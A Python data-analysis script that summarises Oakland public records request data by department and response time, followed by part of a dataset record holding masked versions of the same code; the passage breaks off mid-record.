outs.write('%s,%d\n' % (recdMonKey,openReqMon[recdMonKey])) # outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf,'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay)) outs.close() # outf = outdir + 'NonOPD-NOpen.csv' # outs = open(outf,'w') # outs.write('Month,NOpen\n') # for recdMonKey in allMonth: # outs.write('%s,%d\n' % (recdMonKey,nonOPDopen[recdMonKey])) # outs.close() outf = outdir + 'missClose.csv' outs = open(outf,'w') # missCloseDetails: dept -> recd -> freq allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr+'\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line+'\n') outs.close() def rptDeptFreq(prrTbl, deptTbl,startDate,outf): # freq = defaultdict(int) outs = open(outf,'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept,nrecent)) outs.close() def rptOpenPRR(prrTbl,outf): daysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID] runDate = datetime.datetime.today() for prrID in prrTbl.keys(): prr = prrTbl[prrID] opdP = 'Police Department' in prr['dept'] if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon': recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days # NB: capture integer dividend openYears = openDays // 365 if openYears == 0: dkey = openDays else: dkey = 1000 + openYears daysOpen[opdP][dkey].append(prrID) outs = open(outf,'w') outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n') allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys())) allNDay = sorted(list(allNDaySet)) for nday in allNDay: if nday > 365: lbl = '> %d year' % (nday-1000) else: lbl = '%d' % nday opdList = daysOpen[1][nday] if nday in daysOpen[1] else [] nonList = daysOpen[0][nday] if nday in daysOpen[0] else [] outs.write('%s,%d,%d,"%s","%s"\n' % (lbl,len(opdList),len(nonList), opdList,nonList)) outs.close() def getWebPages(prrTbl,outf): outs = open(outf,'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i,prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode("utf-8") if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i,npdf,nempty) # outs.write('%s,%d,"%s"\n' % (prrID,opdP,prr['text'])) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i,entry in enumerate(reader): # Exhibit,PRRId prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList,outf): outs = open(outf,'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID,prr['createDate'].date(),openDays,prr['status'])) outs.close() if __name__ == '__main__': dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/' startDate = datetime.datetime(2017,1,1) csvFile = dataDir + 'requests-2020-07-01-sdoran.csv' # prr20, deptTbl = bldIndexTblCSV(csvFile) prr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate) openPRRFile = dataDir + 'openPRR_200831.csv' rptOpenPRR(prr20Recent,openPRRFile) deptFreqFile = dataDir + 'deptFreq2.csv' rptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile) createDateFile = dataDir + 'createDate_200831.csv' anlyzCreateDates(prr20Recent,createDateFile) clearDateDir = dataDir + 'deptClear_200831/' anlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir) openOPDFile = dataDir + 'openOPD_200831.csv' rptOpenPRR(prr20Recent,openOPDFile)
flexible
{ "blob_id": "b3758e42b52bb50d806832c6a3a76ae0537266de", "index": 8043, "step-1": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\n<mask token>\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\n<mask token>\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\ndef rptOpenPRR(prrTbl, outf):\n daysOpen = defaultdict(lambda : defaultdict(list))\n runDate = datetime.datetime.today()\n for prrID in prrTbl.keys():\n prr = prrTbl[prrID]\n opdP = 'Police Department' in prr['dept']\n if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr[\n 'status'] == 'Due soon':\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n openYears = openDays // 365\n if openYears == 0:\n dkey = openDays\n else:\n dkey = 1000 + openYears\n daysOpen[opdP][dkey].append(prrID)\n outs = open(outf, 'w')\n outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\\n')\n allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys()))\n allNDay = sorted(list(allNDaySet))\n for nday in allNDay:\n if nday > 365:\n lbl = '> %d year' % (nday - 1000)\n else:\n lbl = '%d' % nday\n opdList = daysOpen[1][nday] if nday in daysOpen[1] else []\n nonList = daysOpen[0][nday] if nday in daysOpen[0] else []\n outs.write('%s,%d,%d,\"%s\",\"%s\"\\n' % (lbl, len(opdList), len(nonList\n ), opdList, nonList))\n outs.close()\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n 